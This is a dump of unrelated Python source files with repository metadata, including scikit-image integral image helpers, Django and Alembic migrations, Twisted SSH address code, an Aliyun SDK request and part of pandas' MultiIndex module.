3503a652c351bffd54f475a1937194144e327487 | 1,479 | py | Python | skimage/transform/integral.py | odebeir/scikits-image | 13b2170dfd3ee9065ba6d65f29ff37f6b3bf948e | [
"BSD-3-Clause"
] | 8 | 2016-03-11T13:23:51.000Z | 2021-12-19T10:43:26.000Z | skimage/transform/integral.py | odebeir/scikits-image | 13b2170dfd3ee9065ba6d65f29ff37f6b3bf948e | [
"BSD-3-Clause"
] | 5 | 2021-03-19T08:36:48.000Z | 2022-01-13T01:52:34.000Z | skimage/transform/integral.py | odebeir/scikits-image | 13b2170dfd3ee9065ba6d65f29ff37f6b3bf948e | [
"BSD-3-Clause"
] | 4 | 2020-06-19T00:04:34.000Z | 2021-02-23T07:24:00.000Z | import numpy as np
def integral_image(x):
"""Integral image / summed area table.
The integral image contains the sum of all elements above and to the
left of it, i.e.:
.. math::
S[m, n] = \sum_{i \leq m} \sum_{j \leq n} X[i, j]
Parameters
----------
x : ndarray
Input image.
Returns
-------
S : ndarray
Integral image / summed area table.
References
----------
.. [1] F.C. Crow, "Summed-area tables for texture mapping,"
ACM SIGGRAPH Computer Graphics, vol. 18, 1984, pp. 207-212.
"""
return x.cumsum(1).cumsum(0)
def integrate(ii, r0, c0, r1, c1):
"""Use an integral image to integrate over a given window.
Parameters
----------
ii : ndarray
Integral image.
r0, c0 : int or ndarray
Top-left corner(s) of block to be summed.
r1, c1 : int or ndarray
Bottom-right corner(s) of block to be summed.
Returns
-------
S : scalar or ndarray
Integral (sum) over the given window(s).
"""
if np.isscalar(r0):
r0, c0, r1, c1 = [np.asarray([x]) for x in (r0, c0, r1, c1)]
S = np.zeros(r0.shape, ii.dtype)
S += ii[r1, c1]
good = (r0 >= 1) & (c0 >= 1)
S[good] += ii[r0[good] - 1, c0[good] - 1]
good = r0 >= 1
S[good] -= ii[r0[good] - 1, c1[good]]
good = c0 >= 1
S[good] -= ii[r1[good], c0[good] - 1]
if S.size == 1:
return np.asscalar(S)
return S
| 20.830986 | 72 | 0.529412 |
992154694fca84a12a87b45f9714c1c9d5ff7674 | 3,498 | py | Python | articat/tests/utils.py | related-sciences/articat | 76f6469484afc0525f5a9a3a418f28dd8e2a900b | [
"Apache-2.0"
] | 2 | 2021-10-20T10:24:49.000Z | 2021-12-01T01:53:30.000Z | articat/tests/utils.py | related-sciences/articat | 76f6469484afc0525f5a9a3a418f28dd8e2a900b | [
"Apache-2.0"
] | 21 | 2021-07-12T20:06:52.000Z | 2022-02-08T21:48:08.000Z | articat/tests/utils.py | related-sciences/articat | 76f6469484afc0525f5a9a3a418f28dd8e2a900b | [
"Apache-2.0"
] | null | null | null | import os
from contextlib import contextmanager
from datetime import date, timedelta
from functools import lru_cache
from random import shuffle
from typing import TYPE_CHECKING, ClassVar, Iterator, Optional, Type, TypeVar
import fsspec
from google.cloud import datastore
from articat.artifact import ID, Partition, Version
from articat.catalog import Catalog
from articat.catalog_datastore import CatalogDatastore
from articat.config import ArticatConfig
from articat.fs_artifact import FSArtifact
T = TypeVar("T", bound="TestFSArtifactMixin")
class TestCatalog(CatalogDatastore):
"""Datastore Catalog used for tests"""
@classmethod
@lru_cache
def _client(
cls, project: str = "foobar", namespace: Optional[str] = None
) -> datastore.Client:
os.environ["DATASTORE_EMULATOR_HOST"] = "127.0.0.1:8099"
return datastore.Client(project=project, namespace=namespace)
if TYPE_CHECKING:
# NOTE: we want to use TestFSArtifactMixin across multiple
# test classes, and flavours of FSArtifact
BASE_CLASS = FSArtifact
else:
BASE_CLASS = object
class TestFSArtifactMixin(BASE_CLASS):
# Note: we overwrite str format in tests to avoid partition path conflicts
# for versioned outputs
_partition_str_format: ClassVar[str] = "%Y%m%dT%H%M%S%f"
@classmethod
def _catalog(cls) -> "Type[Catalog]":
return TestCatalog
@classmethod
@contextmanager
def dummy_versioned_ctx(
cls: Type[T], uid: ID, version: Version, dev: bool = False
) -> Iterator[T]:
with cls.versioned(uid, version, dev=dev) as a:
with fsspec.open(a.joinpath("output.txt"), "w") as f:
f.write("ala ma kota")
a.files_pattern = f"{a.staging_file_prefix}/output.txt"
yield a
@classmethod
def write_dummy_versioned(
cls: Type[T], uid: ID, version: Version, dev: bool = False
) -> T:
with cls.dummy_versioned_ctx(uid, version, dev=dev) as a:
...
return a
@classmethod
@contextmanager
def dummy_partitioned_ctx(
cls: Type[T], uid: ID, partition: Partition, dev: bool = False
) -> Iterator[T]:
with cls.partitioned(uid, partition=partition, dev=dev) as a:
with fsspec.open(a.joinpath("output.txt"), "w") as f:
f.write("ala ma kota")
assert ArticatConfig.fs_tmp_prefix() in a.staging_file_prefix
a.files_pattern = f"{a.staging_file_prefix}/output.txt"
yield a
@classmethod
def write_dummy_partitioned(
cls: Type[T], uid: ID, partition: Partition, dev: bool = False
) -> T:
with cls.dummy_partitioned_ctx(uid, partition, dev=dev) as a:
...
return a
class TestFSArtifact(TestFSArtifactMixin, FSArtifact):
"""FSArtifact used for tests"""
__test__: ClassVar[bool] = False
"""
This field prevents pytest from interpreting TestFSArtifact as
a test class. Artifact can also check for the existence of
__test__ to check if it's running the the test context.
"""
def write_a_couple_of_partitions(uid: ID, n: int) -> None:
# we shuffle the partitions to further tests ordering etc
ns = list(range(n))
shuffle(ns)
for i in ns:
dt = date.today() - timedelta(days=i)
TestFSArtifact.write_dummy_partitioned(uid, dt)
# write some unrelated dataset
TestFSArtifact.write_dummy_partitioned(f"{uid}1234", dt)
| 32.091743 | 78 | 0.670669 |
9a327b067a0d36d4754df4890de769bd8d78f2d8 | 2,335 | py | Python | django_airavata/apps/auth/migrations/0008_auto_20210422_1838.py | akbranam/airavata-django-portal | 2ba71a34af95b58ba225abb6d5ad1d969af92142 | [
"Apache-2.0"
] | 19 | 2017-09-04T00:36:52.000Z | 2022-01-24T08:44:22.000Z | django_airavata/apps/auth/migrations/0008_auto_20210422_1838.py | akbranam/airavata-django-portal | 2ba71a34af95b58ba225abb6d5ad1d969af92142 | [
"Apache-2.0"
] | 35 | 2017-10-17T02:36:01.000Z | 2022-03-09T04:46:57.000Z | django_airavata/apps/auth/migrations/0008_auto_20210422_1838.py | akbranam/airavata-django-portal | 2ba71a34af95b58ba225abb6d5ad1d969af92142 | [
"Apache-2.0"
] | 38 | 2017-09-15T14:17:42.000Z | 2021-12-15T17:11:31.000Z | # Generated by Django 2.2.17 on 2021-04-22 18:38
import uuid
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
from django_airavata.apps.auth.models import VERIFY_EMAIL_CHANGE_TEMPLATE
def default_templates(apps, schema_editor):
EmailTemplate = apps.get_model("django_airavata_auth", "EmailTemplate")
verify_email_template = EmailTemplate(
template_type=VERIFY_EMAIL_CHANGE_TEMPLATE,
subject="{{first_name}} {{last_name}} ({{username}}), "
"Please Verify Your New Email Address in {{portal_title}}",
body="""
<p>
Dear {{first_name}} {{last_name}},
</p>
<p>
Before your email address change can be processed, you need to verify
your new email address ({{email}}). Click the link below to verify your email
address:
</p>
<p><a href="{{url}}">{{url}}</a></p>
""".strip())
verify_email_template.save()
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('django_airavata_auth', '0007_auto_20200917_1610'),
]
operations = [
migrations.AlterField(
model_name='emailtemplate',
name='template_type',
field=models.IntegerField(choices=[(1, 'Verify Email Template'), (2, 'New User Email Template'), (3, 'Password Reset Email Template'), (4, 'User Added to Group Template'), (5, 'Verify Email Change Template')], primary_key=True, serialize=False),
),
migrations.CreateModel(
name='PendingEmailChange',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email_address', models.EmailField(max_length=254)),
('verification_code', models.CharField(default=uuid.uuid4, max_length=36, unique=True)),
('created_date', models.DateTimeField(auto_now_add=True)),
('verified', models.BooleanField(default=False)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.RunPython(default_templates, migrations.RunPython.noop),
]
| 38.916667 | 257 | 0.643255 |
b5b5826fc5f3a62d3a91b26bd49de9e2645ba626 | 2,396 | py | Python | datagen/utilities/collectAreaAndDelay.py | animeshbchowdhury/OpenABC | 140191680bbe7843b1407af5822b099421212cf1 | [
"BSD-3-Clause"
] | 18 | 2021-10-10T00:19:59.000Z | 2022-03-22T01:24:58.000Z | datagen/utilities/collectAreaAndDelay.py | animeshbchowdhury/OpenABC | 140191680bbe7843b1407af5822b099421212cf1 | [
"BSD-3-Clause"
] | 1 | 2021-12-22T19:37:33.000Z | 2021-12-22T20:52:09.000Z | datagen/utilities/collectAreaAndDelay.py | animeshbchowdhury/OpenABC | 140191680bbe7843b1407af5822b099421212cf1 | [
"BSD-3-Clause"
] | 1 | 2022-02-21T15:09:47.000Z | 2022-02-21T15:09:47.000Z | import os,sys
import re,argparse
import os.path as osp
designSet1 = ['i2c','spi','des3_area','ss_pcm','usb_phy','sasc','wb_dma','simple_spi']
designSet2 = ['dynamic_node','aes','pci','ac97_ctrl','mem_ctrl','tv80','fpu']
designSet3 = ['wb_conmax','tinyRocket','aes_xcrypt','aes_secworks']
designSet4 = ['jpeg','bp_be','ethernet','vga_lcd','picosoc']
designSet5 = ['dft','idft','fir','iir','sha256']
homeDir = None
benchDataFolder = None
statsDataFolder = None
designs = designSet1+designSet2+designSet3+designSet4+designSet5
NUM_SYNTHESIZED_DESIGNS = 1500
csvDelimiter = ","
designSet = designSet1+designSet2+designSet3+designSet4+designSet5
def getFileLines(filePath):
f = open(filePath,'r')
fLines = f.readlines()
f.close()
return fLines
def collectAreaAndDelay():
adpFolder = osp.join(statsDataFolder,"adp")
if not os.path.exists(adpFolder):
os.mkdir(adpFolder)
for des in designs:
desLogDir = osp.join(benchDataFolder,des,"log_"+des)
csv_file = os.path.join(adpFolder, 'adp_'+des+'.csv')
csvFileHandler = open(csv_file,'w+')
csvFileHandler.write("sid,area,delay\n")
for i in range(NUM_SYNTHESIZED_DESIGNS):
synth_stat_file = os.path.join(desLogDir,'log_'+des+"_syn"+str(i)+'.log')
synthFileLines = getFileLines(synth_stat_file)
information = re.findall('[a-zA-Z0-9.]+',synthFileLines[-1])
csvFileHandler.write(str(i)+csvDelimiter+str(information[-9])+csvDelimiter+str(information[-4])+"\n")
csvFileHandler.close()
def setGlobalAndEnvironmentVars(cmdArgs):
global homeDir,benchDataFolder,statsDataFolder
homeDir = cmdArgs.home
if not (os.path.exists(homeDir)):
print("\nPlease rerun with appropriate paths")
benchDataFolder = os.path.join(homeDir,"OPENABC_DATASET","bench")
statsDataFolder = os.path.join(homeDir,"OPENABC_DATASET","statistics")
def parseCmdLineArgs():
parser = argparse.ArgumentParser(prog='Final AIG area and delay Collection', description="Circuit characteristics")
parser.add_argument('--version',action='version', version='1.0.0')
parser.add_argument('--home',required=True, help="OpenABC dataset home path")
return parser.parse_args()
def main():
cmdArgs = parseCmdLineArgs()
setGlobalAndEnvironmentVars(cmdArgs)
collectAreaAndDelay()
if __name__ == '__main__':
main()
| 36.861538 | 119 | 0.702003 |
49ee95dd998d6a46a62aa0a68099b0ef80babadd | 840 | py | Python | talentmap_api/common/management/commands/create_base_permissions.py | MetaPhase-Consulting/State-TalentMAP-API | 4e238cbfe241fd3d0a718a9a0fc038dbed00f13b | [
"CC0-1.0"
] | 7 | 2018-10-17T15:13:05.000Z | 2021-12-10T14:53:38.000Z | talentmap_api/common/management/commands/create_base_permissions.py | MetaPhase-Consulting/State-TalentMAP-API | 4e238cbfe241fd3d0a718a9a0fc038dbed00f13b | [
"CC0-1.0"
] | 208 | 2018-12-28T17:11:00.000Z | 2022-03-29T18:47:23.000Z | talentmap_api/common/management/commands/create_base_permissions.py | MetaPhase-Consulting/State-TalentMAP-API | 4e238cbfe241fd3d0a718a9a0fc038dbed00f13b | [
"CC0-1.0"
] | null | null | null | from django.core.management.base import BaseCommand
import logging
from django.contrib.auth.models import Group
class Command(BaseCommand):
help = 'Creates application-wide permissions and groups'
logger = logging.getLogger(__name__)
def __init__(self, *args, **kwargs):
super(Command, self).__init__(*args, **kwargs)
self.groups = [
"bidder",
"cdo",
"bureau_ao",
"glossary_editors",
"bidcycle_admin",
"superuser",
"bureau_user",
"ao_user",
"post_user",
]
def handle(self, *args, **options):
for group_name in self.groups:
group = Group.objects.get_or_create(name=group_name)
if group[1]:
self.logger.info(f"Created group {group_name}")
| 26.25 | 64 | 0.578571 |
3e1b52c4b51dd8de73eb0dd715ad76752b3dbfef | 603 | py | Python | tensorhive/migrations/versions/58a12e45663e_add_hostname_column_to_the_resources_.py | roscisz/TensorHive | 4a680f47a0ee1ce366dc82ad9964e229d9749c4e | [
"Apache-2.0"
] | 129 | 2017-08-25T11:45:15.000Z | 2022-03-29T05:11:25.000Z | tensorhive/migrations/versions/58a12e45663e_add_hostname_column_to_the_resources_.py | roscisz/TensorHive | 4a680f47a0ee1ce366dc82ad9964e229d9749c4e | [
"Apache-2.0"
] | 251 | 2017-07-27T10:05:58.000Z | 2022-03-02T12:46:13.000Z | tensorhive/migrations/versions/58a12e45663e_add_hostname_column_to_the_resources_.py | roscisz/TensorHive | 4a680f47a0ee1ce366dc82ad9964e229d9749c4e | [
"Apache-2.0"
] | 20 | 2017-08-13T13:05:14.000Z | 2022-03-19T02:21:37.000Z | """Add hostname column to the resources table
Revision ID: 58a12e45663e
Revises: 06ce06e9bb85
Create Date: 2020-10-20 18:24:40.267394
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '58a12e45663e'
down_revision = '06ce06e9bb85'
branch_labels = None
depends_on = None
def upgrade():
with op.batch_alter_table('resources') as batch_op:
batch_op.add_column(sa.Column('hostname', sa.String(length=64), nullable=True))
def downgrade():
with op.batch_alter_table('resources') as batch_op:
batch_op.drop_column('hostname')
| 22.333333 | 87 | 0.74461 |
ef9bd30b7501bb0dd13a1a0c38aad8fefc9664c2 | 1,610 | py | Python | aliyun-python-sdk-ccc/aliyunsdkccc/request/v20170705/GetRecordOssUploadParamRequest.py | jia-jerry/aliyun-openapi-python-sdk | e90f3683a250cfec5b681b5f1d73a68f0dc9970d | [
"Apache-2.0"
] | 1 | 2021-03-08T02:59:17.000Z | 2021-03-08T02:59:17.000Z | aliyun-python-sdk-ccc/aliyunsdkccc/request/v20170705/GetRecordOssUploadParamRequest.py | jia-jerry/aliyun-openapi-python-sdk | e90f3683a250cfec5b681b5f1d73a68f0dc9970d | [
"Apache-2.0"
] | 1 | 2020-05-31T14:51:47.000Z | 2020-05-31T14:51:47.000Z | aliyun-python-sdk-ccc/aliyunsdkccc/request/v20170705/GetRecordOssUploadParamRequest.py | jia-jerry/aliyun-openapi-python-sdk | e90f3683a250cfec5b681b5f1d73a68f0dc9970d | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkccc.endpoint import endpoint_data
class GetRecordOssUploadParamRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'CCC', '2017-07-05', 'GetRecordOssUploadParam')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId)
def get_FileName(self):
return self.get_query_params().get('FileName')
def set_FileName(self,FileName):
self.add_query_param('FileName',FileName) | 36.590909 | 76 | 0.768323 |
3e257987a705a275fde7132f4219c8f8360e7356 | 602 | py | Python | thecut/ordering/receivers.py | exemplarysoftware/thecut-ordering | 7de68cd993e2a1833863c83d2f3edd34dae9571b | [
"Apache-2.0"
] | null | null | null | thecut/ordering/receivers.py | exemplarysoftware/thecut-ordering | 7de68cd993e2a1833863c83d2f3edd34dae9571b | [
"Apache-2.0"
] | null | null | null | thecut/ordering/receivers.py | exemplarysoftware/thecut-ordering | 7de68cd993e2a1833863c83d2f3edd34dae9571b | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.db.models import Max
def set_order(sender, instance, **kwargs):
"""If not set, determine and set the instance's order value."""
from .models import OrderMixin
is_order_subclass = issubclass(instance.__class__, OrderMixin)
raw = kwargs.get('raw', False)
if is_order_subclass and not any([instance.pk, instance.order, raw]):
order = instance.__class__.objects.aggregate(
order=Max('order')).get('order')
instance.order = order + 1 if order is not None else 1
| 35.411765 | 73 | 0.694352 |
e3b286be06c7cdde074647e23434bbc9a31b0519 | 637 | py | Python | tests/test_util.py | michaelrath-work/spojit | 75b8c920a342ca9b7869b2fdd826f0b468482341 | [
"MIT"
] | null | null | null | tests/test_util.py | michaelrath-work/spojit | 75b8c920a342ca9b7869b2fdd826f0b468482341 | [
"MIT"
] | null | null | null | tests/test_util.py | michaelrath-work/spojit | 75b8c920a342ca9b7869b2fdd826f0b468482341 | [
"MIT"
] | null | null | null | import pytest
from spojit.util import date_time_to_timestamp
from spojit.util import resource_similarity
def test_date_time_to_timestamp():
assert 1497967200 == date_time_to_timestamp("2017-06-20T16:00:00Z")
def test_resource_similarity():
assert pytest.approx(0.5, 0.01) == resource_similarity(
["a", "b", "c", "d"], ["a", "c", "e"]
)
assert pytest.approx(0.5, 0.01) == resource_similarity(
["a", "c", "e"], ["a", "b", "c", "d"]
)
assert pytest.approx(0.0, 0.01) == resource_similarity(["a", "a"], ["b"])
assert pytest.approx(0.5, 0.01) == resource_similarity(["a", "a"], ["b", "a"])
| 27.695652 | 82 | 0.616954 |
ed84901f3b1d1e91252a6f743abe5ddd8fab5dff | 155 | py | Python | tests/model_control/detailed/transf_Quantization/model_control_one_enabled_Quantization_MovingMedian_NoCycle_AR.py | shaido987/pyaf | b9afd089557bed6b90b246d3712c481ae26a1957 | [
"BSD-3-Clause"
] | 377 | 2016-10-13T20:52:44.000Z | 2022-03-29T18:04:14.000Z | tests/model_control/detailed/transf_Quantization/model_control_one_enabled_Quantization_MovingMedian_NoCycle_AR.py | ysdede/pyaf | b5541b8249d5a1cfdc01f27fdfd99b6580ed680b | [
"BSD-3-Clause"
] | 160 | 2016-10-13T16:11:53.000Z | 2022-03-28T04:21:34.000Z | tests/model_control/detailed/transf_Quantization/model_control_one_enabled_Quantization_MovingMedian_NoCycle_AR.py | ysdede/pyaf | b5541b8249d5a1cfdc01f27fdfd99b6580ed680b | [
"BSD-3-Clause"
] | 63 | 2017-03-09T14:51:18.000Z | 2022-03-27T20:52:57.000Z | import tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Quantization'] , ['MovingMedian'] , ['NoCycle'] , ['AR'] ); | 38.75 | 82 | 0.748387 |
aae53f91690d7960fdfa06cb9d005dc42e31a3a9 | 1,108 | py | Python | twisted/conch/ssh/address.py | sxamit/twisted | 30f6966329c857c3631c60aeb420d84d7828e01e | [
"MIT",
"Unlicense"
] | 1 | 2017-08-07T14:52:02.000Z | 2017-08-07T14:52:02.000Z | Lib/site-packages/twisted/conch/ssh/address.py | adzhou/Python27 | a7113b69d54a04cc780143241c2f1fe81939ad3a | [
"bzip2-1.0.6"
] | null | null | null | Lib/site-packages/twisted/conch/ssh/address.py | adzhou/Python27 | a7113b69d54a04cc780143241c2f1fe81939ad3a | [
"bzip2-1.0.6"
] | 1 | 2018-11-07T12:52:07.000Z | 2018-11-07T12:52:07.000Z | # -*- test-case-name: twisted.conch.test.test_address -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Address object for SSH network connections.
Maintainer: Paul Swartz
@since: 12.1
"""
from zope.interface import implementer
from twisted.internet.interfaces import IAddress
from twisted.python import util
@implementer(IAddress)
class SSHTransportAddress(object, util.FancyEqMixin):
"""
Object representing an SSH Transport endpoint.
This is used to ensure that any code inspecting this address and
attempting to construct a similar connection based upon it is not
mislead into creating a transport which is not similar to the one it is
indicating.
@ivar address: A instance of an object which implements I{IAddress} to
which this transport address is connected.
"""
compareAttributes = ('address',)
def __init__(self, address):
self.address = address
def __repr__(self):
return 'SSHTransportAddress(%r)' % (self.address,)
def __hash__(self):
return hash(('SSH', self.address))
| 23.574468 | 75 | 0.714801 |
c1ded32814009c4305b6ef7c8e51b7e7ba989304 | 247 | py | Python | 000-025/p003/inle/inle_2.py | CDL-Project-Euler/Solutions | 2a31ff286b9bbe7a9cd97539da5ce9091c1123d8 | [
"MIT"
] | 3 | 2020-05-09T17:48:49.000Z | 2021-10-09T06:45:41.000Z | 000-025/p003/inle/inle_2.py | CDL-Project-Euler/solutions | 2a31ff286b9bbe7a9cd97539da5ce9091c1123d8 | [
"MIT"
] | null | null | null | 000-025/p003/inle/inle_2.py | CDL-Project-Euler/solutions | 2a31ff286b9bbe7a9cd97539da5ce9091c1123d8 | [
"MIT"
] | null | null | null | def largest_prime_factor(num, prev_max = 2):
for pos_fact in range(prev_max, num):
if num % pos_fact == 0:
return largest_prime_factor(int(num / pos_fact), pos_fact)
return num
print(largest_prime_factor(600851475143)) | 35.285714 | 70 | 0.696356 |
0c158d47cfa3b98e76b6fbd8861f96500d300d02 | 134,381 | py | Python | pandas/core/indexes/multi.py | rth/pandas | fd151ba5a873ecf6392897f722abfdfae915303e | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 | 2021-08-30T15:26:32.000Z | 2021-08-30T15:26:32.000Z | pandas/core/indexes/multi.py | rth/pandas | fd151ba5a873ecf6392897f722abfdfae915303e | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 2 | 2021-09-05T22:23:43.000Z | 2021-09-07T01:54:50.000Z | pandas/core/indexes/multi.py | rth/pandas | fd151ba5a873ecf6392897f722abfdfae915303e | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | from __future__ import annotations
from functools import wraps
from sys import getsizeof
from typing import (
TYPE_CHECKING,
Any,
Callable,
Collection,
Hashable,
Iterable,
List,
Sequence,
Tuple,
cast,
)
import warnings
import numpy as np
from pandas._config import get_option
from pandas._libs import (
algos as libalgos,
index as libindex,
lib,
)
from pandas._libs.hashtable import duplicated
from pandas._typing import (
AnyArrayLike,
DtypeObj,
Scalar,
Shape,
npt,
)
from pandas.compat.numpy import function as nv
from pandas.errors import (
InvalidIndexError,
PerformanceWarning,
UnsortedIndexError,
)
from pandas.util._decorators import (
Appender,
cache_readonly,
deprecate_nonkeyword_arguments,
doc,
)
from pandas.core.dtypes.cast import coerce_indexer_dtype
from pandas.core.dtypes.common import (
ensure_int64,
ensure_platform_int,
is_categorical_dtype,
is_hashable,
is_integer,
is_iterator,
is_list_like,
is_object_dtype,
is_scalar,
pandas_dtype,
)
from pandas.core.dtypes.dtypes import ExtensionDtype
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCDatetimeIndex,
ABCTimedeltaIndex,
)
from pandas.core.dtypes.missing import (
array_equivalent,
isna,
)
import pandas.core.algorithms as algos
from pandas.core.arrays import Categorical
from pandas.core.arrays.categorical import factorize_from_iterables
import pandas.core.common as com
import pandas.core.indexes.base as ibase
from pandas.core.indexes.base import (
Index,
_index_shared_docs,
ensure_index,
get_unanimous_names,
)
from pandas.core.indexes.frozen import FrozenList
from pandas.core.indexes.numeric import Int64Index
from pandas.core.ops.invalid import make_invalid_op
from pandas.core.sorting import (
get_group_index,
indexer_from_factorized,
lexsort_indexer,
)
from pandas.io.formats.printing import pprint_thing
if TYPE_CHECKING:
from pandas import (
CategoricalIndex,
DataFrame,
Series,
)
_index_doc_kwargs = dict(ibase._index_doc_kwargs)
_index_doc_kwargs.update(
{"klass": "MultiIndex", "target_klass": "MultiIndex or list of tuples"}
)
class MultiIndexUIntEngine(libindex.BaseMultiIndexCodesEngine, libindex.UInt64Engine):
"""
This class manages a MultiIndex by mapping label combinations to positive
integers.
"""
_base = libindex.UInt64Engine
def _codes_to_ints(self, codes):
"""
Transform combination(s) of uint64 in one uint64 (each), in a strictly
monotonic way (i.e. respecting the lexicographic order of integer
combinations): see BaseMultiIndexCodesEngine documentation.
Parameters
----------
codes : 1- or 2-dimensional array of dtype uint64
Combinations of integers (one per row)
Returns
-------
scalar or 1-dimensional array, of dtype uint64
Integer(s) representing one combination (each).
"""
# Shift the representation of each level by the pre-calculated number
# of bits:
codes <<= self.offsets
# Now sum and OR are in fact interchangeable. This is a simple
# composition of the (disjunct) significant bits of each level (i.e.
# each column in "codes") in a single positive integer:
if codes.ndim == 1:
# Single key
return np.bitwise_or.reduce(codes)
# Multiple keys
return np.bitwise_or.reduce(codes, axis=1)
class MultiIndexPyIntEngine(libindex.BaseMultiIndexCodesEngine, libindex.ObjectEngine):
"""
This class manages those (extreme) cases in which the number of possible
label combinations overflows the 64 bits integers, and uses an ObjectEngine
containing Python integers.
"""
_base = libindex.ObjectEngine
def _codes_to_ints(self, codes):
"""
Transform combination(s) of uint64 in one Python integer (each), in a
strictly monotonic way (i.e. respecting the lexicographic order of
integer combinations): see BaseMultiIndexCodesEngine documentation.
Parameters
----------
codes : 1- or 2-dimensional array of dtype uint64
Combinations of integers (one per row)
Returns
-------
int, or 1-dimensional array of dtype object
Integer(s) representing one combination (each).
"""
# Shift the representation of each level by the pre-calculated number
# of bits. Since this can overflow uint64, first make sure we are
# working with Python integers:
codes = codes.astype("object") << self.offsets
# Now sum and OR are in fact interchangeable. This is a simple
# composition of the (disjunct) significant bits of each level (i.e.
# each column in "codes") in a single positive integer (per row):
if codes.ndim == 1:
# Single key
return np.bitwise_or.reduce(codes)
# Multiple keys
return np.bitwise_or.reduce(codes, axis=1)
def names_compat(meth):
"""
A decorator to allow either `name` or `names` keyword but not both.
This makes it easier to share code with base class.
"""
@wraps(meth)
def new_meth(self_or_cls, *args, **kwargs):
if "name" in kwargs and "names" in kwargs:
raise TypeError("Can only provide one of `names` and `name`")
elif "name" in kwargs:
kwargs["names"] = kwargs.pop("name")
return meth(self_or_cls, *args, **kwargs)
return new_meth
class MultiIndex(Index):
"""
A multi-level, or hierarchical, index object for pandas objects.
Parameters
----------
levels : sequence of arrays
The unique labels for each level.
codes : sequence of arrays
Integers for each level designating which label at each location.
sortorder : optional int
Level of sortedness (must be lexicographically sorted by that
level).
names : optional sequence of objects
Names for each of the index levels. (name is accepted for compat).
copy : bool, default False
Copy the meta-data.
verify_integrity : bool, default True
Check that the levels/codes are consistent and valid.
Attributes
----------
names
levels
codes
nlevels
levshape
Methods
-------
from_arrays
from_tuples
from_product
from_frame
set_levels
set_codes
to_frame
to_flat_index
sortlevel
droplevel
swaplevel
reorder_levels
remove_unused_levels
get_locs
See Also
--------
MultiIndex.from_arrays : Convert list of arrays to MultiIndex.
MultiIndex.from_product : Create a MultiIndex from the cartesian product
of iterables.
MultiIndex.from_tuples : Convert list of tuples to a MultiIndex.
MultiIndex.from_frame : Make a MultiIndex from a DataFrame.
Index : The base pandas Index type.
Notes
-----
See the `user guide
<https://pandas.pydata.org/pandas-docs/stable/user_guide/advanced.html>`__
for more.
Examples
--------
A new ``MultiIndex`` is typically constructed using one of the helper
methods :meth:`MultiIndex.from_arrays`, :meth:`MultiIndex.from_product`
and :meth:`MultiIndex.from_tuples`. For example (using ``.from_arrays``):
>>> arrays = [[1, 1, 2, 2], ['red', 'blue', 'red', 'blue']]
>>> pd.MultiIndex.from_arrays(arrays, names=('number', 'color'))
MultiIndex([(1, 'red'),
(1, 'blue'),
(2, 'red'),
(2, 'blue')],
names=['number', 'color'])
See further examples for how to construct a MultiIndex in the doc strings
of the mentioned helper methods.
"""
_hidden_attrs = Index._hidden_attrs | frozenset()
# initialize to zero-length tuples to make everything work
_typ = "multiindex"
_names = FrozenList()
_levels = FrozenList()
_codes = FrozenList()
_comparables = ["names"]
sortorder: int | None
# --------------------------------------------------------------------
# Constructors
def __new__(
cls,
levels=None,
codes=None,
sortorder=None,
names=None,
dtype=None,
copy=False,
name=None,
verify_integrity: bool = True,
):
# compat with Index
if name is not None:
names = name
if levels is None or codes is None:
raise TypeError("Must pass both levels and codes")
if len(levels) != len(codes):
raise ValueError("Length of levels and codes must be the same.")
if len(levels) == 0:
raise ValueError("Must pass non-zero number of levels/codes")
result = object.__new__(cls)
result._cache = {}
# we've already validated levels and codes, so shortcut here
result._set_levels(levels, copy=copy, validate=False)
result._set_codes(codes, copy=copy, validate=False)
result._names = [None] * len(levels)
if names is not None:
# handles name validation
result._set_names(names)
if sortorder is not None:
result.sortorder = int(sortorder)
else:
result.sortorder = sortorder
if verify_integrity:
new_codes = result._verify_integrity()
result._codes = new_codes
result._reset_identity()
return result
def _validate_codes(self, level: list, code: list):
"""
Reassign code values as -1 if their corresponding levels are NaN.
Parameters
----------
code : list
Code to reassign.
level : list
Level to check for missing values (NaN, NaT, None).
Returns
-------
new code where code value = -1 if it corresponds
to a level with missing values (NaN, NaT, None).
"""
null_mask = isna(level)
if np.any(null_mask):
code = np.where(null_mask[code], -1, code)
return code
def _verify_integrity(self, codes: list | None = None, levels: list | None = None):
"""
Parameters
----------
